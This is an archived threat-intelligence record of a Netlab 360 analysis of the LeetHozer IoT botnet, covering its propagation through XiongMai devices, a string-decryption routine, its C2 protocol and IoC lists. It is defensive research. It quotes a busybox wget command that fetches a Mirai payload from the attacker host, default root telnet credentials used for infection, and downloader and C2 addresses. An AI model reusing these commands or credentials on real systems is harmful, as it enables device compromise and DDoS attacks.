{
	"id": "fd421208-a309-401c-827a-42f248265206",
	"created_at": "2026-04-10T03:20:22.85902Z",
	"updated_at": "2026-04-10T13:11:51.016911Z",
	"deleted_at": null,
	"sha1_hash": "c823fb7b976a6131af5dc7424483100e3fbb0c46",
	"title": "The LeetHozer botnet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 320365,
	"plain_text": "The LeetHozer botnet\r\nBy Alex.Turing\r\nPublished: 2020-04-27 · Archived: 2026-04-10 02:43:57 UTC\r\nBackground\r\nOn March 26, 2020, we captured a suspicious sample 11c1be44041a8e8ba05be9df336f9231 . Although the samples\r\nhave the word mirai in their names and most antivirus engines identified it as Mirai, its network traffic is totally\r\nnew,which had got our attention.\r\nThe sample borrowed some of Mirai’s Reporter and Loader mechanism, but the encryption method and Bot\r\nprogram, as well as C2 communication protocol had been totally redesigned.\r\nFor regular Mirai and their variations, normally the changes are fairly minor, changing C2s or encryption keys, or\r\nintegrate some new vulnerabilities, nothing dramatic.\r\nBut this one is different. Its encryption method is unique, and communication protocol is more rigorous. Also it is\r\nvery likely a new branch from the Moobot group and is in active development. (the author released a third version\r\nwhile we work on this article, adding some new function and changing Tor C2 : vbrxmrhrjnnouvjf.onion:31337 )\r\nSo we think we should blog it and decide to name it LeetHozer because of the H0z3r string( /bin/busybox wget\r\nhttp://37[.49.226.171:80/bins/mirai.m68k -O - \u003e H0z3r; )\r\nThe targets devices currently observed are mainly XiongMai H.264 and H.265 devices.\r\nPropagation\r\nIn 2017, security researchers disclosed the vulnerability[2].\r\n2020-02-04 POC was released on github[3]。[4].\r\n2020-02-11 We saw a moobot variant we called moobot_xor exploiting this vulnerability.\r\n2020-03-26 LeetHozer began to exploit the vulnerability.\r\nLeetHozer takes advantage of the vulnerability through the target device's TCP 9530 port to start the telnetd\r\nservice, then login to the device with the default password to complete the infection process. The propagation\r\nhttps://blog.netlab.360.com/the-leethozer-botnet-en/\r\nPage 1 of 13\n\nprocess is shown in the figure:\r\nThe source IP currently exploiting the vulnerability is around 4.5k per day.\r\nLeetHozer and moobot_xor used the same unique string /bin/busybox DNXXXFF in their 9530 exploit. We also\r\nobserved that at times they used the exact same downloader, so we speculate that moobot_xor and LeetHozer\r\nprobably belong to the same organization or individual.\r\nThe time periods and the downloader shared by the two families are as follows:\r\nhttps://blog.netlab.360.com/the-leethozer-botnet-en/\r\nPage 2 of 13\n\ndate=2020-03-26 08:11:46+08:00 md5=11c1be44041a8e8ba05be9df336f9231 family_name=LeetHozer url=http://185\r\ndate=2020-03-26 08:11:39+08:00 md5=11c1be44041a8e8ba05be9df336f9231 family_name=LeetHozer url=http://185.1\r\ndate=2020-03-26 08:11:39+08:00 md5=b7b2ae292bf182b0d91535770394ad93 family_name=moobot_xor url=http://185.1\r\nThe recent LeetHozer DDos targets we currently see\r\n2020-04-07 37.49.226.171 31337 ddos tcpraw 45.83.128.252 ASN40676 Psych\r\n2020-04-07 37.49.226.171 31337 ddos udpplain 172.106.18.210 ASN40676 Psych\r\n2020-04-08 37.49.226.171 31337 ddos udpplain 185.172.110.224 ASN206898 Serve\r\n2020-04-11 w6gr2jqz3eag4ksi.onion 31337 ddos icmpecho 185.38.151.161 ASN25369 Hydra\r\n2020-04-13 37.49.226.171 31337 ddos icmpecho 73.99.44.254 ASN7922 Comca\r\n2020-04-13 37.49.226.171 31337 ddos icmpecho 94.174.77.69 ASN5089 Virgi\r\n2020-04-13 37.49.226.171 31337 ddos udppplain 94.174.77.69 ASN5089\r\n2020-04-16 37.49.226.171 31337 ddos icmpecho 117.27.239.28 ASN133774 Fuzho\r\n2020-04-16 37.49.226.171 31337 ddos icmpecho 185.172.110.224 ASN206898 Serve\r\n2020-04-16 37.49.226.171 31337 ddos icmpecho 52.47.76.48 ASN16509 Amazo\r\n2020-04-16 37.49.226.171 31337 ddos tcpraw 117.27.239.28 ASN133774 Fuzho\r\n2020-04-16 37.49.226.171 31337 ddos tcpraw 162.248.93.234 ASN32374 Nucle\r\n2020-04-16 37.49.226.171 31337 ddos udpplain 71.222.69.77 ASN209 Centu\r\n2020-04-17 37.49.226.171 31337 ddos udpplain 117.27.239.28 ASN133774 Fuzho\r\n2020-04-18 37.49.226.171 31337 ddos tcpraw 76.164.193.89 ASN36114 Versa\r\n2020-04-18 37.49.226.171 31337 ddos udpplain 117.27.239.28 ASN133774 Fuzho\r\n2020-04-18 37.49.226.171 31337 ddos udpplain 66.150.188.101 ASN32374 Nucle\r\n2020-04-19 37.49.226.171 31337 ddos tcpraw 117.27.239.28 ASN133774 Fuzho\r\n2020-04-19 37.49.226.171 31337 ddos udpplain 108.61.22.86 ASN20473 Choop\r\n2020-04-19 37.49.226.171 31337 ddos udpplain 108.61.33.194 ASN20473 Choop\r\n2020-04-19 37.49.226.171 31337 ddos udpplain 172.107.228.198 ASN40676 Psych\r\n2020-04-19 37.49.226.171 31337 ddos udpplain 192.99.226.11 ASN16276 OVH_S\r\n2020-04-19 37.49.226.171 31337 ddos udpplain 209.58.147.245 ASN394380 Lease\r\n2020-04-19 37.49.226.171 31337 ddos udpplain 24.46.209.115 ASN6128 Cable\r\n2020-04-19 37.49.226.171 31337 ddos udpplain 71.222.69.77 ASN209 Centu\r\n2020-04-20 37.49.226.171 31337 ddos udpplain 139.28.218.180 ASN9009 M247_\r\n2020-04-20 37.49.226.171 31337 ddos udpplain 74.91.122.90 ASN14586 Nucle\r\n2020-04-23 37.49.226.171 31337 ddos icmpecho 162.244.55.107 ASN49544 i3D.n\r\n2020-04-23 37.49.226.171 31337 ddos udpplain 162.244.55.107 ASN49544 i3D.n\r\nReverse analysis\r\nAt present, there are three versions of LeetHozer samples (We are going to focus on V2 as V3 is in development\r\nnow). The difference between V1 and V2 is mainly that V2 supports more DDos attack methods.\r\nhttps://blog.netlab.360.com/the-leethozer-botnet-en/\r\nPage 3 of 13\n\nWe are going to take a quick look at the sample’s behavior, DDos command format, network communication\r\nbelow.\r\nMD5: 57212f7e253ecebd39ce5a8a6bd5d2df\r\nELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped\r\nPacker: None\r\nLibrary: uclibc\r\nVersion: V2\r\nSample behavior\r\nThe function of LeetHozer is relatively simple, when it runs on infected device, it operates the watchdog\r\ndevice,then write the pid to a file named .1 , and prints out /bin/sh:./a.out:not found string to the console(\r\nto confuse the user?). After that, it starts to scan internet to find more devices with open port 9530, and try to use\r\nthe vulnerability to open the telnetd service on more victim devices.\r\nThe sample also reports the infected device information to the reporter, and establishes communication with C2,\r\nwaiting for instructions to launch DDos attack.\r\nThe sample uses a custom algorithm for encryptiton. The decryption algorithm is as follows:\r\nxorkey=\"qE6MGAbI\"\r\ndef decode_str(ctxt):\r\n for i in range(0,len(xorkey)):\r\n plain=\"\"\r\n size=len(ctxt)\r\n for idx in range(0, size):\r\nhttps://blog.netlab.360.com/the-leethozer-botnet-en/\r\nPage 4 of 13\n\nch=ord(ctxt[idx])\r\n ch ^=(ord(xorkey[i]) + idx )\r\n plain += chr(ch)\r\n ctxt=plain\r\n return ctxt\r\nAfter decryption, the key information is as follows, including the watchdog devices, C2 to be operated by the Bot.\r\nThe information will only be decrypted when it is needed by the bot.\r\n.1 /dev/watchdog\r\n/dev/misc/watchdog /bin/sh: ./a.out: not found\r\nw6gr2jqz3eag4ksi.onion\r\nThe specific implementation of the Bot function is as follows:，\r\n1. Set watchdog to prevent device restart\r\n2. Bot singleton through PID file\r\n3. Scan, exploitation and report information\r\nhttps://blog.netlab.360.com/the-leethozer-botnet-en/\r\nPage 5 of 13\n\nmirai's fast port scan technique has been borrowed, the scanned port is 9530\r\nUse the vulnerability to enable the telnetd service and try to log in with the following credentials.\r\nroot:xc3511\r\nroot:xmhdipc\r\nroot:klv123\r\nroot:123456\r\nroot:jvbzd\r\nroot:hi3518\r\nroot:tsgoingon\r\nReport device information after successful login\r\n4. Receive the C2 command and prepare for DDos attack. The attack commands supported by different\r\nversions are different.\r\nversion command\r\nV1 tcpraw\r\nv2 tcpraw;icmpecho;udpplain\r\nHowever, the data format of the attack command is the same, and its structure is Header(6\r\nbytes),Option1,Option2... ，in which the structure of Option is Type(2 bytes),Len(2 bytes),Subtype(2\r\nhttps://blog.netlab.360.com/the-leethozer-botnet-en/\r\nPage 6 of 13\n\nbytes),Contents( Len bytes),Padding , the following takes an actual attack command as an example to\r\nexplain the parsing process.\r\n00000000: 3E 00 3F 00 3A 00 01 00 08 00 04 00 75 64 70 70 \u003e.?.:.......udpp\r\n00000010: 6C 61 69 6E 00 00 00 00 01 00 0E 00 06 00 31 33 lain..........13\r\n00000020: 39 2E 32 38 2E 32 31 38 2E 31 38 30 00 00 00 00 9.28.218.180....\r\n00000030: 02 00 01 00 0C 00 50 00 02 00 01 00 05 00 64 00 ......P.......d.\r\n----------------------------------------------------------------------------\r\nHeader: 3E 00 3F 00 3A 00, ----Little endian\r\n0x003E ---- xor key\r\n0x003A ---- 0x3A xor 0x3E = 4 个Option\r\nOpt 1: 01 00 08 00 04 00, ----Little endian\r\n0x0001 ----Type 1,Padding 4 bytes\r\n0x0008 ----Content length,len(\"udpplain\") = 8\r\n0x0004 ----Subtype 4,Contents为attack vector\r\nContents: udpplain\r\nPadding: 00 00 00 00\r\nOpt 2: 01 00 0E 00 06 00, ----Little endian\r\n0x0001 ----Type 1,Padding 4 bytes\r\n0x000e ----Content length\r\n0x0006 ----Subtype 6,Contents为attack target\r\n Contents: 139.28.218.180\r\n Padding: 00 00 00 00\r\nOpt 3: 02 00 01 00 0c 00, ----Little endian\r\n0x0002 ----Type 2,No Padding\r\n0x0001 ----Type 2 Ignore this field，Contents length is al\r\n 0x000c ----Subtype 0xc,Contents为target port\r\n Contents: 80\r\nOpt 4: 02 00 01 00 05 00, ----Little endian\r\n0x0002 ----Type 2,No Padding\r\n0x0001 ----Type 2 Ignore this field，Contents length is al\r\n0x0005 ----Subtype 0x05,Contents is attack duration\r\n Contents: 0x0064\r\nCommunication protocols\r\nTwo types of C2: Tor-C2 and IP-C2 has been used. The V2 version has both existed but the code branch where\r\nTor-C2 is located will not be executed. It is likely the V2 version is not final yet.\r\n1. Tor-C2，supported by V1，Not used in V2.\r\n w6gr2jqz3eag4ksi.onion:31337\r\nhttps://blog.netlab.360.com/the-leethozer-botnet-en/\r\nPage 7 of 13\n\n2. IP-C2，supported by V2.\r\n37.49.226.171:31337\r\nTor-C2 has a pre-process to establish a connection through Tor proxy. After the connection between Bot and C2 is\r\nestablished, it takes two rounds of interaction for the bot to successfully go online.\r\nEstablish a connection with C2 through Tor proxy\r\nThe hardcode proxy list:\r\n 45.82.176.194:9034\r\n 91.236.251.131:9712\r\n 18.177.13.247:443\r\n 62.109.8.218:8888\r\n 82.99.213.98:9191\r\n 35.225.55.174:9251\r\n 194.99.22.206:9050\r\n 45.147.199.142:8060\r\n 47.104.188.20:8999\r\n 54.149.179.115:9050\r\n 195.128.102.178:9050\r\n 185.176.25.66:9002\r\n 54.188.106.141:9080\r\n 193.47.35.56:10000\r\n 88.193.137.205:9050\r\n 134.209.84.21:9119\r\n 194.58.111.244:9050\r\n 192.99.161.66:9050\r\n 193.47.35.53:9090\r\n 167.179.74.97:9251\r\n 185.30.228.141:9050\r\nFirst round of interaction\r\nThe packet length sent by the Bot is 255 bytes, the first 32 bytes are valid data, and the data is interpreted\r\nin little-endian way.\r\nThe meaning of some key fields\r\nhttps://blog.netlab.360.com/the-leethozer-botnet-en/\r\nPage 8 of 13\n\noffset length content field meaning\r\n0x00 2 bytes 0x8f49 source port\r\n0x02 2 bytes 0x7a69 hardcode\r\n0x04 4 bytes 0x00004818 hardcode\r\n0x0e 2 bytes 0x0001 first round\r\n0x14 4 bytes 0x0051cc checksum\r\nThe calculation of checksum is as follows\r\nstep 1: calc the sum of the first 12 WORD\r\n(0x8f49+0x7a69+0x4818+0x0000+0x0000+0x0000\r\n+0x0001+0x0000+0x0000+0x0000+0x000+0x0000) = 0x000151CB;\r\nstep 2:(HWORD(sum) + LWORD(sum)) \u003e\u003e 16\r\n(0x0001+0x51CB) \u003e\u003e 16 = 0;\r\nstep 3:(HWORD(sum) + LWORD(sum)) \u0026\u0026 0Xffff\r\n(0x0001+0x51cb) \u0026\u0026 0xffff = 0x000051cc\r\nThe first 32 bytes of the C2 reply packet are valid data. The packet length is 255 bytes,interpreted in little-endian way. The Bot will check the two valid flags. When the check passes, part of the data will be used for\r\nthe second round of interaction.\r\noffset length content field meaning\r\n0x04 4 bytes 0x000070f1 valid flag1\r\n0x08 4 bytes 0x00004819 valid flag2\r\nSecond round of interaction\r\nThe packet length sent by the Bot is 255 bytes, the first 32 bytes are valid data, and the data is interpreted\r\nin little-endian way. Most of the data comes from the C2 return packets from the previous step.\r\noffset length content field meaning\r\n0x00 8 bytes 0x7a697a69,0x000070f1 C2 reply in the round 1\r\n0x08 4 bytes 0x000070f2 hardcode\r\nhttps://blog.netlab.360.com/the-leethozer-botnet-en/\r\nPage 9 of 13\n\noffset length content field meaning\r\n0x0e 2 bytes 0x0002 second round\r\n0x14 4 bytes 0x00d665 checksum\r\nThe 32 bytes before the C2 reply packet are valid data. The packet length is 255 bytes,interpreted in little-endian way. The Bot will check two valid flags. When the check passes, the Bot's online process is\r\ncompleted.\r\noffset length content field meaning\r\n0x04 4 bytes 0x00002775 valid flag1\r\n0x08 4 bytes 0x000070f2 valid flag2\r\nAt this point, the identity verification between the Bot and C2 is completed, and the Bot starts to wait for the C2 to\r\nissue instructions. The first byte of the C2 reply packet specifies the type of instruction.\r\nInstruction code: 0x00 indicates heartbeat\r\nInstruction code: 0x01 indicates reporting Bot group information\r\nInstruction code: Not 0x00 0x01 indicates DDoS attack.\r\nReaders are always welcomed to reach us on twitter or email to netlab at 360 dot cn.\r\nIoC list\r\nC2\r\nvbrxmrhrjnnouvjf.onion:31337 #v3\r\n37.49.226.171:31337 #v2\r\nw6gr2jqz3eag4ksi.onion:31337 #v1\r\nMD5\r\nhttps://blog.netlab.360.com/the-leethozer-botnet-en/\r\nPage 10 of 13\n\n027d7e1cda6824bc076d0a586ea139f5\r\n05a485caf78eca390439b7c893c0354b\r\n068083b9d0820f3ac9cec10d03705649\r\n08e1b88305ad138a4509fb6b72ae3d31\r\n0a56855a6d56efe409c2b7a4c6113bcf\r\n0dee2c063085d0c5466137a3c32479f2\r\n0eecbfd368f821901f9ba758e267557a\r\n110ec534e1c60fc47f37739f03c1bb6a\r\n1111c252ee54c4a6614498e66cefb4e7\r\n11c1be44041a8e8ba05be9df336f9231\r\n121960341ab64a7e7686373dedfbc058\r\n128a53e447266e4d0e12adb7c0b43159\r\n129f41468303728b029def8dbc910e35\r\n177de1bf8f90cbcea50fd19c1e3e8cfe\r\n17b5d683d7b177760c8a2ffd749650b0\r\n1aba422e02f0fbff5189399e01e272d4\r\n21e7898b4b585b825d120c3b0fed8b8a\r\n242d0c9386f61c3ac9ddcdbcda724f3e\r\n25588d12bdbb4e4b1d946f2d5c89abf3\r\n273afac3320ddceb0e18671a3e878fa3\r\n2f066945cee892cc857d477d97d42d7c\r\n30c60cfb51896e5d06012ec6cf15c588\r\n3525d090ab1ab1739507ae1777a70b95\r\n37d9fd56ce685717f1180615f555754e\r\n3d24b9cafda55909fbfde16a5222b4d8\r\n3f88cbbcaa3e0b410dcdb18ddb68d4c2\r\n4229c19e6e5c2dc8560fae9b35841957\r\n45a30d656b4767bce0058f80b0895a95\r\n4e22d0079c18043b6d9037fb842d94ee\r\n58a13abe621acc532b1b6d26eb121c61\r\n5ed891c31bc86689cb93488f5746404a\r\n5fafdc3e3ed7c38a204234e0146e5663\r\n5fec7347f2a9a2ae798505135a61c47f\r\n60bb6bf05c3e7f6f13f2374511963f79\r\n669e5f3513ebfa9c30766da294036d6e\r\n6c883cf42d63a672815e38223d241662\r\n6e7e638d27971e060aaee1b9ae43fe4a\r\n76d0285f95fbee81cff81948d5a98db0\r\n7b08a0569506174463c83f50f8d65a8f\r\n84d39f46c4694e176d8734dd53a07c2c\r\n86072e88f28ebf357443300656c0349a\r\n88a39f5bb8e271f3d080a9aaa6c4a44a\r\n8dc36df1617d9c2be576fa02a5c24803\r\n8e7d774441229809c9cfa8d8705b5258\r\n90a63857f31714ff2c285eb6ca9af3d1\r\n919308996155d7a9ec2f7a25a64eb759\r\nhttps://blog.netlab.360.com/the-leethozer-botnet-en/\r\nPage 11 of 13\n\n91fe795b69880972e30929632d359b52\r\n9a63001fe8f2d2d642bc2c8310a429e0\r\n9c95be6e1e9927cc0171fc344fcceb71\r\na42550641cc709168c145b5739fca769\r\na579d46a571e123a9d65dcfe21910c87\r\na76fdf5b2f817dc1f2e3c241d552b9ae\r\naa469ab3eb6789104bda30c910f063f5\r\nb0276d96976dd6b805a02141e78df927\r\nb35733792393a08408773a141a94f668\r\nb84fb91f818a2b221833cb6499e5d345\r\nbd28cdf60b03fc302b0ed467b3ea7e43\r\nc6e9c7e7b5370441b379fd0032af4a85\r\ncc42951a01c07dc7034251fdcd08c778\r\ncce2f84c925f30ba11afd817bdae9377\r\nd9d2c7e131e2f19985fffe9a1f38bca1\r\ndb6b387ba0f1ab17785de63be55e7fb6\r\ndeb66817f026c50d6e78ace69db6f0e6\r\ne8e249712b7ad0bb92ac5ebb1d0f3378\r\ne9ee7ea21696c9e01257c7543d344487\r\neb210bc6a54c1faef3cc043d767a4c3b\r\necf26cb853f2d22b705334cd9acdd3c2\r\nf4aa925fb0d0eda1bdd4b52eecd7d870\r\nfdd05db406a03601b9548aa7a1d07bb6\r\nDownloader\r\nhttp://185[.172.110.224/ab/i586\r\nhttp://185[.172.110.224/ab/i686\r\nhttp://185[.172.110.224/uc/i686\r\nhttp://185.225.19.57/aq/rxrg\r\nhttp://188[.214.30.178/arm6\r\nhttp://188[.214.30.178/arm7\r\nhttp://188[.214.30.178/bot.arm\r\nhttp://188[.214.30.178/bot.arm7\r\nhttp://188[.214.30.178/bot.mips\r\nhttp://188[.214.30.178/bot.mpsl\r\nhttp://188[.214.30.178/bot.x86\r\nhttp://188[.214.30.178/tn/arm\r\nhttp://188[.214.30.178/tn/arm7\r\nhttp://188[.214.30.178/tn/mips\r\nhttp://188[.214.30.178/tn/mpsl\r\nhttp://190[.115.18.144/arm6\r\nhttp://190[.115.18.144/arm7\r\nhttp://190[.115.18.144/bot.arm\r\nhttp://190[.115.18.144/bot.arm7\r\nhttp://190[.115.18.144/bot.mips\r\nhttps://blog.netlab.360.com/the-leethozer-botnet-en/\r\nPage 12 of 13\n\nhttp://190[.115.18.144/bot.mpsl\r\nhttp://190[.115.18.144/bot.x86\r\nhttp://190[.115.18.144/tn/arm\r\nhttp://190[.115.18.144/tn/arm7\r\nhttp://190[.115.18.144/tn/mips\r\nhttp://190[.115.18.144/tn/mpsl\r\nhttp://37[.49.226.171/bins/mirai.arm\r\nhttp://37[.49.226.171/bins/mirai.arm7\r\nhttp://37[.49.226.171/bins/mirai.mpsl\r\nhttp://37[.49.226.171/bins/mirai.sh4\r\nhttp://37[.49.226.171/bins/mirai.x86\r\nhttp://37[.49.226.171/mirai.arm\r\nhttp://37[.49.226.171/mirai.arm7\r\nhttp://37[.49.226.171/mirai.mpsl\r\nhttp://37[.49.226.171/mirai.sh4\r\nhttp://37[.49.226.171/mirai.x86\r\nhttp://64[.225.64.58/arm\r\nhttp://64[.225.64.58/arm5\r\nhttp://64[.225.64.58/arm6\r\nhttp://64[.225.64.58/arm7\r\nhttp://64[.225.64.58/bot.arm\r\nhttp://64[.225.64.58/bot.arm7\r\nhttp://64[.225.64.58/bot.mips\r\nhttp://64[.225.64.58/bot.mpsl\r\nhttp://64[.225.64.58/bot.x86\r\nhttp://64[.225.64.58/i586\r\nhttp://64[.225.64.58/i686\r\nhttp://64[.225.64.58/m68k\r\nhttp://64[.225.64.58/mips\r\nhttp://64[.225.64.58/mpsl\r\nhttp://64[.225.64.58/sh4\r\nhttp://64[.225.64.58/spc\r\nhttp://64[.225.64.58/x86\r\nIP\r\n185.172.110.224 Netherlands ASN206898 Server_Hosting_Pty_Ltd\r\n185.225.19.57 Romania ASN39798 MivoCloud_SRL\r\n37.49.226.171 Netherlands ASN208666 Estro_Web_Services_Private_Limited\r\n64.225.64.58 Netherlands ASN14061 DigitalOcean,_LLC\r\n188.214.30.178 Romania ASN51177 THC_Projects_SRL\r\n190.115.18.144 Russian ASN262254 DANCOM_LTD\r\nSource: https://blog.netlab.360.com/the-leethozer-botnet-en/\r\nhttps://blog.netlab.360.com/the-leethozer-botnet-en/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.netlab.360.com/the-leethozer-botnet-en/"
	],
	"report_names": [
		"the-leethozer-botnet-en"
	],
	"threat_actors": [],
	"ts_created_at": 1775791222,
	"ts_updated_at": 1775826711,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c823fb7b976a6131af5dc7424483100e3fbb0c46.pdf",
		"text": "https://archive.orkl.eu/c823fb7b976a6131af5dc7424483100e3fbb0c46.txt",
		"img": "https://archive.orkl.eu/c823fb7b976a6131af5dc7424483100e3fbb0c46.jpg"
	}
}